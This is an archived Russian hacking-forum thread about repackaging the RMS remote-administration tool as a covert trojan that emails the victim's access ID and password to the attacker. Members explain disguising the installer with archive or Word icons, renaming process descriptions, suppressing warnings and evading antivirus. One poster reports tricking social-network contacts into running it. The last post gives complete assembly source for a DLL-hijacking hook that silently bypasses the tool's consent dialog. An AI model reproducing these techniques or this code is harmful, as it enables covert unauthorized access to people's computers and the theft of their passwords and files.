1. Вы находитесь в архивной версии форума xaker.name. Здесь собраны темы с 2007 по 2012 год, большинство инструкций и мануалов уже неактуальны.
    Скрыть объявление

RMS 5.1 c отправкой ID и pass на почту.

Тема в разделе "Статьи на хакерскую тематику", создана пользователем крах, 14 сен 2011.

Статус темы:
Закрыта.
  1. vlader

    vlader Guest

    Качаем вьювер (в архиве сервер и вьювер, сервер вам не нужен) с офф. сайта, устанавливаем. В меню вьювера выбираем Удалённая установка > MSI конфигуратор. Делаешь по картинке,
    [​IMG]
    настраиваешь сервер, msi файл кидаешь в папку arch, запускаешь make_installer.cmd, в папке появится твой exe файл.

    Добавлено через 1 минуту
    Ой, до меня уже написали. scandalist, да, ты всё правильно написал.
     
    Последнее редактирование модератором: 21 апр 2012
  2. sergeyt241

    sergeyt241 Новичок

    Регистрация:
    24 апр 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Что это за установщик такой? Он выдал ошибку и самоудалился! ????

    Добавлено через 8 минут
    Выдал ошибку, что не может найти svchюst .exe ???? быть может ошибка в буковке????

    [​IMG]

    почему у меня два процесса сервера?
     
    Последнее редактирование: 24 апр 2012
  3. sergeyt241

    sergeyt241 Новичок

    Регистрация:
    24 апр 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Теперь возник вопрос, как "впарить" нашу сборку пользователю? Хотелось бы услышать ваши варианты!
    Я в своей сборке заменил иконку на иконку архива. Название к архиву можно придумать любое.
    [​IMG]

    можно заменить и иконку на любую, к примеру ворда.

    Для эксперимента отправил завсегдатым в контакте по почте этот файл и результат удивил, сразу несколько человек успешно клюнуло...но это так ради эксперимента )
     
    Последнее редактирование: 25 апр 2012
  4. sergeyt241

    sergeyt241 Новичок

    Регистрация:
    24 апр 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Лоадер стал палиться, а как у остальных дела обстоят?

    [​IMG]
     
  5. airstrike

    airstrike Новичок

    Регистрация:
    13 апр 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    AKSENOV048,
    Название ты сменить не сможешь! Иначе работать не будет. Можно скрыть процесс. Подробнее: тык

    А описание легко сменить. Качай "Restorator", ссылка на скачивание в гугле =)

    открываем *.exe в restorator'е, заходим во вкладку "Версия"

    [​IMG]

    а дальше то какие трудности?...
     
    Последнее редактирование: 1 май 2012
  6. airstrike

    airstrike Новичок

    Регистрация:
    13 апр 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    AKSENOV048,

    диспетчер задач отображает описание "самого" файла!

    [​IMG]
     
    Последнее редактирование: 1 май 2012
  7. cheech1440

    cheech1440 Новичок

    Регистрация:
    20 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    если заражать оффлайн систему даунлоадером, то если система находится в оффлайне длительное время, то рано или поздно наш пинг выдает ошибку:
    [​IMG]
    при этом в диспетчере светится куча одинаковых процессов нашего даунлоадера

    надо поправлять... может кто подскажет как это сделать ?
     
  8. wald78

    wald78 Новичок

    Регистрация:
    1 авг 2011
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Всем доброго времени суток! Походу сервер палится AVG free oO...причем находит и убивает два файла...видимо они добавили их в свой список /facepalm
    [​IMG]
     
  9. JIeprekon1467

    JIeprekon1467 Новичок

    Регистрация:
    3 окт 2011
    Сообщения:
    12
    Симпатии:
    0
    Баллы:
    0
    scandalist,ааа я ставил чтоб получался на выходе RMS.exe как и в старой версии. Спасибо попробую первый вариант.

    Добавлено через 23 минуты
    Не помогло, хотя галочка на "Запрашивать подтверждения у пользователя" не стоит и пакет выбран 1-ый
    Вот скрин:
    [​IMG]
     
    Последнее редактирование: 7 май 2012
  10. smith

    smith Новичок

    Регистрация:
    2 янв 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    как правильно написать?

    То есть хочу проверить два условия одновременно и только потом перейти к действию...

    [​IMG] - как переименовать описание процесса?
     
    Последнее редактирование: 16 июн 2012
  11. incode

    incode Banned

    Регистрация:
    19 мар 2012
    Сообщения:
    0
    Симпатии:
    2
    Баллы:
    0
    Resource Hacker либо отсюда, цифровая подпись при этом теряется
     
  12. incode

    incode Banned

    Регистрация:
    19 мар 2012
    Сообщения:
    0
    Симпатии:
    2
    Баллы:
    0
    Вышла новая версия RMS, Версия 5.2.2 (выпущена 13 июля 2012)
    Обновление в основном коснулось вьювера + Мелкие исправления и обновления для сервера
    [​IMG]
     
  13. nebra

    nebra Продвинутый

    Регистрация:
    23 мар 2012
    Сообщения:
    0
    Симпатии:
    12
    Баллы:
    0
    хм 5,2,2 oO что-то я не видел,там только 5,2,1 дай линку
     
  14. kos88tya

    kos88tya Новичок

    Регистрация:
    27 июл 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Здравствуйте, ув. форумчане!
    Подскажите, может делаю что-то не так..
    Собрал пошагово RMS по мануалу, отметил галочками все как писалось и во вкладке "другие" тоже отметил 2 пункта.
    Решил потестить на своем компе, запустил setup.exe
    и почти сразу же открылась вкладка в браузере http://rmansys.ru/ ,
    потом на пару сек появилось уведомление об удалении программы
    и через 10 секунд появляется окно
    [​IMG]

    Как избавиться от этих все уведомлений, пожскажите плиз? А то палевно :)

    И еще - на мыло мне пришел ID и пароль, я попробовал подключиться (сам к себе, но видимо также делать нельзя) поэтому на иконке горит "не в сети"
    В чем тут может быть проблема?
     
  15. deezell48

    deezell48 Новичок

    Регистрация:
    3 авг 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    [​IMG]

    второй день парюсь с этой ошибкой, может кто нибудь поможет? Она выскакивает сразу после установки R-server.

    Ошибка: Error reading TROMServerOptions. Use IPv6:property Use IPv6 does not exist.
     
    Последнее редактирование: 7 авг 2012
  16. wera87

    wera87 Новичок

    Регистрация:
    13 сен 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Подскажите, как открыть видео или картинку на компе жертвы?

    P.S. Я конечно понимаю, что вопрос не по теме, но прощу помоч в этом деле

    GeForse ---идёшь в папку с картинкой ,mp3 , video и тд и тп на компе "несчастного"--->>> жмёшь два раза на "желаемом" файле АБСОЛЮТНО с любым расширением , выскочит ( у тебя во вьювере ) окошко с вопросом скрытого или нет запуска. выбираешь желаемое и жамкай на ОК

    [​IMG]

    **********************************

    P.S.S. Кстати можно ли с помощью какой-нибудь программы визуально изменить разрешение файла, чтобы отображалось например .rar а это по настоящему .exe в нете такую прогу не нашёл, может у вас что есть?

    GeForse - можно и НЕ только rar , можно и НЕ визуально а реально , но будет ДВА файла вместо одного .
     
    1 человеку нравится это.
  17. wera87

    wera87 Новичок

    Регистрация:
    13 сен 2010
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    ***********************************

    GeForse :
    1 - "стартануть" на компе "счастливчика" ЛЮБОЙ файл можно !

    Для этого идём в RMS во вкладку "Файлы" aka "File transfer" и выбираем нужный нам файл jpeg mp3 exe bat и НЕ СКАЧИВАЕМ его к себе , А ДВА РАЗА ЖАМКАЕМ ПО НЕМУ ! Он откроется на компе "счастливчика"..Если поставишь галочку на "Hide" то естественно ты не увидишь на мониторе своего "подопечного" ни какого результата.

    О каком указывании пути идёт речь ?

    ***Подскажите, как открыть видео или картинку на компе жертвы? заходил в пункт "запуск программ" но он только программы и запускает( ***

    при чём тут пункт "запуск программ" ??? , когда речь идёт о третьем пункте в твоём клиенте который называется "Файлы" или "File transfer" . С каких таких пор картинки стали программами ? Как ты пытаешься запустить картинко.JPEG через запуск программ aka .EXE /facepalm/facepalm/facepalm???
    может с меня плохой "пояснятель" , тогда скрин для вас :

    [​IMG]

    2 - все ВАШИ проблемы ОТ ВАШЕЙ НЕВНИМАТЕЛЬНОСТИ ! НЕ желания прочитать ПОЛНОСТЬЮ и ВЕСЬ топик ! Прочитав мануал на первой странице этого захватывающего блок бастера ВЫ переходите к исполнению своей заветной мечты ---->>> залезть в комп своей девушки/ врага / вообще не известного человека и стырить/ свистнуть пароли/фото ...
    ВСЕ отписавшиеся в этой теме по поводу того что НЕ ПОЛУЧАЕТСЯ /НЕ МОГУ / ВЫСКАКИВАЕТ САЙТ/ ВЫСКАКИВАЕТ ОКНО / И тд и тп - НЕ ЧИТАЛИ ТЕМУ ВНИМАТЕЛЬНО ! Ответы на любой вопрос есть и НЕ по ОДНОМУ разу уже !

    GeForse :
    3 - прога может и есть , но я делаю руками. Там делов на три минуты. Но повторюсь --->>> будет 2 ( ДВА !) файла.

    4 - Топик и так завален уже , посему пиши в ЛС ( во избежание бана за чат/флуд/спам/набив ненужных постов )

    ***********************
     
    Последнее редактирование: 8 авг 2012
  18. incode

    incode Banned

    Регистрация:
    19 мар 2012
    Сообщения:
    0
    Симпатии:
    2
    Баллы:
    0
    Началось бета-тестирование новой версии "RMS Удаленный доступ" 5.3.1

    Бета 1: (07.09.2012)
    Новый интерфейс главного окна Viewer'а.
    Функция удаленной печати документов. На удаленном компьютере (Host) можно распечатать любой документ на нашем виртуальном принтере (RMS Printer), во время сеанса удаленного управления рабочим столом, и данные будут автоматически перенаправлены на Viewer.
    Исправлена проблема с редкими зависаниями процесса rfusclient.exe во время копирования данных в буфер обмена.
    Мелкие доработки.

    [​IMG]

    [​IMG]

    http://rmansys.ru/download/rms5.3.1b1ru.zip

    http://rmansys.ru/forum/rus/viewtopic.php?f=1&t=3678
     
  19. Megatron13

    Megatron13 Новичок

    Регистрация:
    2 фев 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
  20. toxic0

    toxic0 Новичок

    Регистрация:
    23 окт 2012
    Сообщения:
    0
    Симпатии:
    0
    Баллы:
    0
    Регился на xakepy.cc чтобы связаться с Саламандрой. Но она шифруется. А сегодня хотел зайти на сайт, а сайт еще и лежит к тому же. Вот такие дела :)

    [+] скрин
    [​IMG]
    [свернуть]



    У меня сохранились сырцы. Предлагаю разобраться совместными усилиями. Где, в каком месте она перехватывает вызов окна с предупреждением об отправке ID? Помню Саламандра говорила что при нажатии кнопки "Да" в регистр eax заносится 6-ка. Нужно занести 6-ку в регистр не создавая окна.


    [+] oledlg.asm

    Код:
    format PE GUI 4.0 DLL
    entry DllEntryPoint
    		     
      include 'windows.inc'
    		     
    		     
    	  HOOK_DLL_NAME equ	'\oledlg.dll'
    		     
    section '.code' code readable executable
    		     
    ;--------------------------------------------------------------------------------; 
    ; [DllEntryPoint]
    ;--------------------------------------------------------------------------------; 
                         
      proc DllEntryPoint hinstDLL,fdwReason,lpvReserved
        .if        [fdwReason] = DLL_PROCESS_ATTACH
              invoke     GetSystemDirectory,szSysDllPath,256
              cinvoke    strcat,szSysDllPath,HOOK_DLL_NAME
              invoke     LoadLibrary,addr szSysDllPath
              mov        [hHookMod],eax
              invoke     RtlAddVectoredExceptionHandler,1,VectoredExceptionHandler
              mov        [handler],eax
              cinvoke    memcpy,origbyte,[MessageBox],1
              stdcall    SetHook,MessageBox,newbyte
        .elseif    [fdwReason] = DLL_PROCESS_DETACH
              invoke     FreeLibrary,[hHookMod]
        .endif     
              mov        eax,TRUE
              ret        
      endp    
                         
                         
    ;--------------------------------------------------------------------------------; 
    ; [GetProcAddr]
    ;--------------------------------------------------------------------------------; 
                         
      proc GetProcAddr,szProcName
              invoke     GetProcAddress,[hHookMod],[szProcName]
              ret        
      endp    
                         
                         
                         
                         
                         
                         
    ;--------------------------------------------------------------------------------;
    ; [SetHook]
    ;--------------------------------------------------------------------------------;
    
      proc SetHook uses ebx edi,addrcode,byte
        locals 
              OldProtect           dd ?
        endl 
              lea        ebx,[OldProtect]
              mov        edi,[addrcode]
              mov        edi,[edi]
              stdcall    _ZwProtectVirtualMemory,-1,edi,1,PAGE_EXECUTE_READWRITE,ebx
              cinvoke    memcpy,edi,[byte],1
              stdcall    _ZwProtectVirtualMemory,-1,edi,1,[OldProtect],ebx
              ret        
                         
      endp    
                         
                         
                         
    ;--------------------------------------------------------------------------------; 
    ; [_ZwProtectVirtualMemory]
    ;--------------------------------------------------------------------------------; 
                         
      proc _ZwProtectVirtualMemory ProcessHandle,BaseAddress,BytesToProtect,NewProtection,OldProtection
              invoke     ZwProtectVirtualMemory,[ProcessHandle],addr BaseAddress,addr BytesToProtect,[NewProtection],[OldProtection]
              ret        
      endp    
                         
                         
    ;--------------------------------------------------------------------------------; 
    ; [VectoredExceptionHandler]
    ;--------------------------------------------------------------------------------; 
                         
      proc VectoredExceptionHandler uses ebx,ExceptionPointers
              mov        ebx,[ExceptionPointers]
              assign     ebx,EXCEPTION_POINTERS
              mov        edx,[.ebx.pExceptionRecord]
              assign     edx,EXCEPTION_RECORD
              mov        ecx,[.ebx.ContextRecord]
              assign     ecx,CONTEXT
              cmp        [.edx.ExceptionCode],EXCEPTION_BREAKPOINT
              jne        @f
              mov        [.ecx.regEax],6
              push       FakeMessageBox
              pop        [.ecx.regEip]
              stdcall    SetHook,MessageBox,origbyte
              invoke     RtlRemoveVectoredExceptionHandler,[handler]
              mov        eax,EXCEPTION_CONTINUE_EXECUTION
              ret        
      @@:        
              mov        eax,EXCEPTION_CONTINUE_SEARCH
              ret        
      endp    
                         
                         
      FakeMessageBox: 
              pop        ecx
              add        esp,4*4
              jmp        ecx
                         
    		     
    		     
    		     
    		     
    		     
    section '.data' data readable writeable
    		     
    	  origbyte	       db 0
    	  newbyte	       db 0cch
    	  szSysDllPath	       db 256 dup (?)
    	  handler	       dd ?
    	  hHookMod	       dd ?
    		     
    		     
    		     
    HookApi   OleUIAddVerbMenuA,\
    	  OleUICanConvertOrActivateAs,\ 
    	  OleUIInsertObjectA,\ 
    	  OleUIPasteSpecialA,\
              OleUIEditLinksA,\
              OleUIChangeIconA,\
              OleUIConvertA,\
              OleUIBusyA,\
              OleUIUpdateLinksA,\
              OleUIPromptUserA,\
              OleUIObjectPropertiesA,\
              OleUIChangeSourceA,\
              OleUIAddVerbMenuW,\
              OleUIBusyW,\
              OleUIChangeIconW,\
              OleUIChangeSourceW,\
              OleUIConvertW,\
              OleUIEditLinksW,\
              OleUIInsertObjectW,\
              OleUIObjectPropertiesW,\
              OleUIPasteSpecialW,\
              OleUIPromptUserW,\
              OleUIUpdateLinksW 
    		     
    		     
    		     
    section '.idat' import readable executable
    		     
      library kernel32,'KERNEL32.DLL',\
    	  user32,'USER32.DLL',\ 
    	  ntdll,'NTDLL.DLL' 
    		     
      import  kernel32,\
    	  GetSystemDirectory,'GetSystemDirectoryA',\
    	  LoadLibrary,'LoadLibraryA',\
    	  FreeLibrary,'FreeLibrary',\
    	  GetProcAddress,'GetProcAddress'
    
      import   user32,\
    	   MessageBox,'MessageBoxW'
    
      import  ntdll,\
    	  ZwProtectVirtualMemory,'ZwProtectVirtualMemory',\
    	  RtlAddVectoredExceptionHandler,'RtlAddVectoredExceptionHandler',\
    	  RtlRemoveVectoredExceptionHandler,'RtlRemoveVectoredExceptionHandler',\
    	  memcpy,'memcpy',\
    	  strcat,'strcat'
    
    section '.reloc' fixups data discardable
       

    [свернуть]



    И вот на тот случай если хареру не встанет, то

    [+] кэш гугла
    Всё довольно просто!Когда вываливается мессага,то из тела "rutserv.exe",или "rfusclient.exe",(не занималась детальным анализом,поэтому точно сказать не могу,но одинаковое присутствует в обеих файлах)вызвается апишка MessageBoxW и после нажатия отправить на мыльник данные для подключения в регистр eax заноситься значение 6,что говорит программе совершить требуемые действия.Для того что б исключить отображение сообщения и одновременно выслать письмецо,нужно каким то образом совершить перехват данной айпишки и в своём обработчике,не вызывая оригинального кода подставить в регистр eax правильный указатель.Прямой патчинг не подходит из за наличия цифровой подписи у файлов,остаётся внедрение своего кода в адресное пространство процесса.Самым простым и беспалёвным способом является использование уязвимости типа dll Hijacking.Суть уязвимости сводится к тому,что приложение не проверяет корректность путей при загрузки файлов в частности системных длл например и можно создать файл с одинаковым названием и поместить в одну директорию с программой и произойдёт загрузка.В этой своей дллке установить перехват посредством сплайсинга,или другими способами,придумано множество,один из самых простых сплайсинг,очень старый,но вполне подойдёт для такой прикладной задачи.Вот и вся метода.Из системных длл к примеру можно использовать rasadhlp.dll.
    [свернуть]



    Мне кажется что изменения производились в процедуре векторного обработчика исключений VectoredExceptionHandler, а именно строчка mov [.ecx.regEax],6 Здесь мне всё понятно.

    Дальше вызывается функция FakeMessageBox с таким вот содержимым:

    Код:
    FakeMessageBox: 
              pop        ecx
              add        esp,4*4
              jmp        ecx
    И вот не могу понять FakeMessageBox тоже Саламандра написала и зачем?
     
    Последнее редактирование: 31 окт 2012
Статус темы:
Закрыта.

Поделиться этой страницей